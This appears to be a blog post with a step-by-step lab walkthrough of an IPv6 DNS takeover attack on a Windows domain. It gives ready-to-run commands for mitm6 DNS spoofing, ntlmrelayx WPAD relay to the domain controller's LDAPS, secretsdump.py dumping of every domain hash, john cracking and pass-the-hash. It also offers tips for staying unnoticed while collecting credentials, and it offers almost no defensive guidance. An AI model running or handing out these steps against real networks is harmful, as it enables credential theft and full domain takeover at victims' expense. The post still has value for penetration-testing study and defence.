IPv6 is enabled by default on Windows networks starting from Windows Vista and Server 2008. This default configuration presents an opportunity to exploit DNS resolution, allowing an attacker to spoof DNS replies, intercept credentials, and authenticate to services within the network.
Exploiting Default IPv6 Behavior
When a Windows machine checks for its DNS settings, it expects to communicate with a legitimate DNS server. By spoofing the DNS server, an attacker can intercept these requests and manipulate responses. Windows machines typically check DNS settings every 30 minutes or at startup and restart.
If a user enters their credentials during this period, an event is triggered, sending NTLM hashes to the attacker's machine. These hashes can then be relayed to authenticate against other network resources, such as the Domain Controller (DC) or other machines. If the compromised credentials belong to a domain administrator, the attacker gains significant control over the network.
Tools for the Attack
To execute this attack, I'll use:
- mitm6 to spoof the DNS and assign the attacker machine as the IPv6 DNS server.
- ntlmrelayx to relay captured NTLM hashes to LDAP on the DC.
Step 1: Launching mitm6
sudo mitm6 -d steins.local
Once started, mitm6 listens for Windows clients requesting IPv6 configuration via DHCPv6. Since all Windows machines since Vista request this configuration regularly, mitm6 assigns an IPv6 address to the victim and sets the attacker's machine as the default IPv6 DNS server.
With this setup, the victim’s machine logs the attacker as its IPv6 DNS server and starts requesting a WPAD (Web Proxy Auto-Discovery Protocol) configuration.
Step 2: Exploiting WPAD
WPAD is a protocol that helps clients discover proxy configurations via DHCP and DNS. Because the victim machine trusts the attacker’s DNS server, it attempts to retrieve a WPAD configuration from it.
Using ntlmrelayx, I will serve a malicious WPAD configuration to capture authentication attempts.
sudo ntlmrelayx.py -6 -t ldaps://192.168.109.128 -wh wpad.steins.local -l ~/Desktop/Session/Domain_info | tee relay
-6enables IPv6 support.-tspecifies the target (in this case, LDAPS on the DC).-whdefines the WPAD host.-lsets the directory for storing captured data.
Step 3: Capturing NTLM Hashes
At this point, I simply wait for users to log in. The Windows authentication process automatically attempts to use WPAD, sending NTLM hashes to the attacker's machine.
Rather than forcing an authentication prompt (which is noisy and suspicious), I let users restart or turn on their computers naturally. As soon as they log in, their credentials are captured. In a real-world scenario, an attacker could wait and accumulate multiple credentials over time.
Step 4: Privilege Escalation
When an admin logs in, ntlmrelayx automatically creates a new account with domain controller access. From here, I can:
- Dump credentials from the DC using secretsdump.py.
- Perform lateral movement within the network.
- Deploy further attacks against critical systems.
secretsdump.py username@192.168.109.128
This retrieves NTLM hashes for all users in the domain.
Step 5: Next Steps - Cracking or Passing the Hash
With these hashes, I have two main options:
1) Crack the Hash
sudo john --format=LM hash ~/Downloads/Tools/rockyou.txt
2) Pass the Hash
Instead of cracking, I can use the hashes directly to authenticate to systems within the network, maintaining persistence and escalating privileges further.
Final Thoughts
This attack demonstrates how default IPv6 settings in Windows networks can be leveraged for DNS takeover and credential theft. By combining mitm6 and ntlmrelayx, an attacker can stealthily gain access to critical resources within a domain environment. Understanding and mitigating these risks is crucial for securing enterprise networks against such threats.
No comments:
Post a Comment